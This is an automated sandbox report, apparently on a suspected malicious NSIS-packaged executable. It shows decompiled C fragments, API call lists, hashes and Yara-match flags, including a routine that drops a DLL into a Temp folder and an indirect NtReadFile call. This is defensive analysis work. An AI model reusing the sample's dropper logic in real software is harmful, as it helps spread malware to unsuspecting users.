                                                  							__eflags = _t59;
                                                  							 *_t44 = 0x2a;
                                                  							goto L21;
                                                  						}
                                                  						_t59 = _v20;
                                                  						__eflags =  *(_t59 + 0x74) - 1;
                                                  						if( *(_t59 + 0x74) <= 1) {
                                                  							L15:
                                                  							__eflags = _t50 -  *(_t59 + 0x74);
                                                  							L16:
                                                  							if(__eflags < 0) {
                                                  								goto L20;
                                                  							}
                                                  							__eflags = _t62[1];
                                                  							if(__eflags == 0) {
                                                  								goto L20;
                                                  							}
                                                  							L18:
                                                  							_t59 =  *(_t59 + 0x74);
                                                  							goto L21;
                                                  						}
                                                  						__eflags = _t50 -  *(_t59 + 0x74);
                                                  						if(__eflags < 0) {
                                                  							goto L16;
                                                  						}
                                                  						__eflags = _a4;
                                                  						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                  						_t59 = _v20;
                                                  						__eflags = _t47;
                                                  						if(_t47 != 0) {
                                                  							goto L18;
                                                  						}
                                                  						goto L15;
                                                  					}
                                                  					_t55 = _a4;
                                                  					__eflags = _t55;
                                                  					if(_t55 != 0) {
                                                  						 *_t55 =  *_t62 & 0x000000ff;
                                                  					}
                                                  					_t59 = 1;
                                                  					goto L21;
                                                  				}
                                                  				_t49 = _a4;
                                                  				if(_t49 != 0) {
                                                  					 *_t49 = 0;
                                                  				}
                                                  				goto L5;
                                                  			}


















                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A198
                                                  • __isleadbyte_l.LIBCMT ref: 1000A1C6
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 1000A1F4
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 1000A22A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: d6c83e277bc716ea1591cbdeb936cd6034286e4470041106544bd5c2a02aea49
                                                  • Instruction ID: 4a33cececc37ca35887a08e274e9fae0a72c5d72ee741c232e152da5190e83ac
                                                  • Opcode Fuzzy Hash: d6c83e277bc716ea1591cbdeb936cd6034286e4470041106544bd5c2a02aea49
                                                  • Instruction Fuzzy Hash: B731AD31600246AFEB11CE69CC44AAA7BE5FF42390F128669F865971A5E731E890DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E1000B9DB(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                  				intOrPtr _t25;
                                                  				void* _t26;
                                                  
                                                  				_t28 = __edx;
                                                  				_t25 = _a16;
                                                  				if(_t25 == 0x65 || _t25 == 0x45) {
                                                  					_t26 = E1000BD64(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                  					goto L9;
                                                  				} else {
                                                  					if(_t25 != 0x66) {
                                                  						if(_t25 == 0x61 || _t25 == 0x41) {
                                                  							_t26 = E1000BE32(_a4, _a8, _a12, _a20, _a24, _a28);
                                                  						} else {
                                                  							_t26 = E1000C33B(__edx, __esi, _a4, _a8, _a12, _a20, _a24, _a28);
                                                  						}
                                                  						L9:
                                                  						return _t26;
                                                  					} else {
                                                  						return E1000C27A(__edx, __esi, _a4, _a8, _a12, _a20, _a28);
                                                  					}
                                                  				}
                                                  			}






                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                                  • Instruction ID: dbdd0e87cc6380aa5b54e683948d6405aed477d357988d2f8a7b222debf84838
                                                  • Opcode Fuzzy Hash: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                                  • Instruction Fuzzy Hash: 12017E3650054EBBDF129F84CC01CEE3FA2FB19290B048415FE1859039D332DAB1AB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E00401D38() {
                                                  				void* __esi;
                                                  				int _t6;
                                                  				signed char _t11;
                                                  				struct HFONT__* _t14;
                                                  				void* _t18;
                                                  				void* _t24;
                                                  				void* _t26;
                                                  				void* _t28;
                                                  
                                                  				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                  				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
                                                  				 *0x40b054 = E00402A0C(3);
                                                  				_t11 =  *((intOrPtr*)(_t28 - 0x18));
                                                  				 *0x40b05b = 1;
                                                  				 *0x40b058 = _t11 & 0x00000001;
                                                  				 *0x40b059 = _t11 & 0x00000002;
                                                  				 *0x40b05a = _t11 & 0x00000004;
                                                  				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
                                                  				_t14 = CreateFontIndirectA(0x40b044);
                                                  				_push(_t14);
                                                  				_push(_t26);
                                                  				E00405B25();
                                                  				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
                                                  				return 0;
                                                  			}












                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D3F
                                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                  • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirect
                                                  • String ID:
                                                  • API String ID: 3272661963-0
                                                  • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                  • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                                                  • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                  • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00402BF1(intOrPtr _a4) {
                                                  				long _t2;
                                                  				struct HWND__* _t3;
                                                  				struct HWND__* _t6;
                                                  
                                                  				if(_a4 == 0) {
                                                  					__eflags =  *0x420c48; // 0x0
                                                  					if(__eflags == 0) {
                                                  						_t2 = GetTickCount();
                                                  						__eflags = _t2 -  *0x42ec2c;
                                                  						if(_t2 >  *0x42ec2c) {
                                                  							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
                                                  							 *0x420c48 = _t3;
                                                  							return ShowWindow(_t3, 5);
                                                  						}
                                                  						return _t2;
                                                  					} else {
                                                  						return E00405F93(0);
                                                  					}
                                                  				} else {
                                                  					_t6 =  *0x420c48; // 0x0
                                                  					if(_t6 != 0) {
                                                  						_t6 = DestroyWindow(_t6);
                                                  					}
                                                  					 *0x420c48 = 0;
                                                  					return _t6;
                                                  				}
                                                  			}







                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                  • GetTickCount.KERNEL32 ref: 00402C22
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                  • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                                  • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                  • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                  				long _t22;
                                                  
                                                  				if(_a8 != 0x102) {
                                                  					if(_a8 != 0x200) {
                                                  						_t22 = _a16;
                                                  						L7:
                                                  						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
                                                  							 *0x42a088 = _t22;
                                                  							E00405BC7(0x42a0a0, 0x42f000);
                                                  							E00405B25(0x42f000, _t22);
                                                  							E0040140B(6);
                                                  							E00405BC7(0x42f000, 0x42a0a0);
                                                  						}
                                                  						L11:
                                                  						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
                                                  					}
                                                  					if(IsWindowVisible(_a4) == 0) {
                                                  						L10:
                                                  						_t22 = _a16;
                                                  						goto L11;
                                                  					}
                                                  					_t22 = E00404782(_a4, 1);
                                                  					_a8 = 0x419;
                                                  					goto L7;
                                                  				}
                                                  				if(_a12 != 0x20) {
                                                  					goto L10;
                                                  				}
                                                  				E00403ECF(0x413);
                                                  				return 0;
                                                  			}





                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00404E39
                                                  • CallWindowProcA.USER32 ref: 00404EA7
                                                    • Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                  • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                                  • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                  • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • property defined, but unable to get value, xrefs: 100020EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AtomNameProp
                                                  • String ID: property defined, but unable to get value
                                                  • API String ID: 3378439024-2444961611
                                                  • Opcode ID: 2f77111288d39f23c46db1507c7fa4daf968883409d61cea7d59ead322a0f20c
                                                  • Instruction ID: 3583f0d05ab507045aaf371a3a66bc946002833c4f8e94d564fd48f644b7d2fe
                                                  • Opcode Fuzzy Hash: 2f77111288d39f23c46db1507c7fa4daf968883409d61cea7d59ead322a0f20c
                                                  • Instruction Fuzzy Hash: D811ECB4904319DBDB00EF99D5846AEBBF4FF48350F00882AFC5597350D7759994CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                  				int _t5;
                                                  				long _t7;
                                                  				struct _OVERLAPPED* _t11;
                                                  				intOrPtr* _t15;
                                                  				void* _t17;
                                                  				int _t21;
                                                  
                                                  				_t15 = __esi;
                                                  				_t11 = __ebx;
                                                  				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
                                                  					_t7 = lstrlenA(E00402A29(0x11));
                                                  				} else {
                                                  					E00402A0C(1);
                                                  					 *0x40a040 = __al;
                                                  				}
                                                  				if( *_t15 == _t11) {
                                                  					L8:
                                                  					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                  				} else {
                                                  					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll", _t7, _t17 + 8, _t11);
                                                  					_t21 = _t5;
                                                  					if(_t21 == 0) {
                                                  						goto L8;
                                                  					}
                                                  				}
                                                  				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
                                                  				return 0;
                                                  			}










                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll, xrefs: 004024FD, 00402522
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: FileWritelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll
                                                  • API String ID: 427699356-3798551589
                                                  • Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                  • Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
                                                  • Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                  • Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405427(CHAR* _a4) {
                                                  				struct _PROCESS_INFORMATION _v20;
                                                  				int _t7;
                                                  
                                                  				0x42c0a8->cb = 0x44;
                                                  				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
                                                  				if(_t7 != 0) {
                                                  					CloseHandle(_v20.hThread);
                                                  					return _v20.hProcess;
                                                  				}
                                                  				return _t7;
                                                  			}






                                                  APIs
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                  • CloseHandle.KERNEL32(?), ref: 00405459
                                                  Strings
                                                  • Error launching installer, xrefs: 0040543A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                  • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                                                  • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                  • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403585() {
                                                  				void* _t2;
                                                  				void* _t3;
                                                  				void* _t6;
                                                  				void* _t8;
                                                  
                                                  				_t8 =  *0x42905c;
                                                  				_t3 = E0040356A(_t2, 0);
                                                  				if(_t8 != 0) {
                                                  					do {
                                                  						_t6 = _t8;
                                                  						_t8 =  *_t8;
                                                  						FreeLibrary( *(_t6 + 8));
                                                  						_t3 = GlobalFree(_t6);
                                                  					} while (_t8 != 0);
                                                  				}
                                                  				 *0x42905c =  *0x42905c & 0x00000000;
                                                  				return _t3;
                                                  			}








                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                                  • GlobalFree.KERNEL32 ref: 004035A6
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3936084776
                                                  • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                  • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                                  • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                  • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405701(char* _a4) {
                                                  				char* _t3;
                                                  				char* _t5;
                                                  
                                                  				_t5 = _a4;
                                                  				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                  				while( *_t3 != 0x5c) {
                                                  					_t3 = CharPrevA(_t5, _t3);
                                                  					if(_t3 > _t5) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				 *_t3 =  *_t3 & 0x00000000;
                                                  				return  &(_t3[1]);
                                                  			}






                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,80000000,00000003), ref: 00405707
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,80000000,00000003), ref: 00405715
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3125694417
                                                  • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                  • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                                  • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                  • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405813(CHAR* _a4, CHAR* _a8) {
                                                  				int _t10;
                                                  				int _t15;
                                                  				CHAR* _t16;
                                                  
                                                  				_t15 = lstrlenA(_a8);
                                                  				_t16 = _a4;
                                                  				while(lstrlenA(_t16) >= _t15) {
                                                  					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                  					_t10 = lstrcmpiA(_t16, _a8);
                                                  					if(_t10 == 0) {
                                                  						return _t16;
                                                  					}
                                                  					_t16 = CharNextA(_t16);
                                                  				}
                                                  				return 0;
                                                  			}







                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
                                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                  • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                                  • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                  • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  C-Code - Quality: 19%
                                                  			E0041867E(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                                  				void* _t18;
                                                  				void* _t29;
                                                  				void* _t30;
                                                  				intOrPtr* _t31;
                                                  				void* _t33;
                                                  
                                                  				asm("adc al, 0x55");
                                                  				_t13 = _a4;
                                                  				_t31 = _a4 + 0xc48;
                                                  				E004191D0(_t29, _t13, _t31,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                  				_t4 =  &_a40; // 0x413a41
                                                  				_t18 =  *((intOrPtr*)( *_t31))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t30, _t33); // executed
                                                  				return _t18;
                                                  			}









                                                  APIs
                                                  • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: A:A
                                                  • API String ID: 2738559852-2859176346
                                                  • Opcode ID: 5f553616136bcfd002f51044b5940ec2dd8b9f6e539dd67c070b982bdc6d6b6d
                                                  • Instruction ID: 75d8bc83ae80fe0485e2f6667b675e81cff7515ff28dee8b552c5e372aa23c08
                                                  • Opcode Fuzzy Hash: 5f553616136bcfd002f51044b5940ec2dd8b9f6e539dd67c070b982bdc6d6b6d
                                                  • Instruction Fuzzy Hash: 85F0F4B2200108ABCB08DF89DC84EEB77A9EF8C754F058248FE1D97241C630E851CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E00418680(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                                  				void* _t18;
                                                  				void* _t27;
                                                  				intOrPtr* _t28;
                                                  
                                                  				_t13 = _a4;
                                                  				_t28 = _a4 + 0xc48;
                                                  				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                  				_t4 =  &_a40; // 0x413a41
                                                  				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                                                  				return _t18;
                                                  			}







                                                  APIs
                                                  • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: A:A
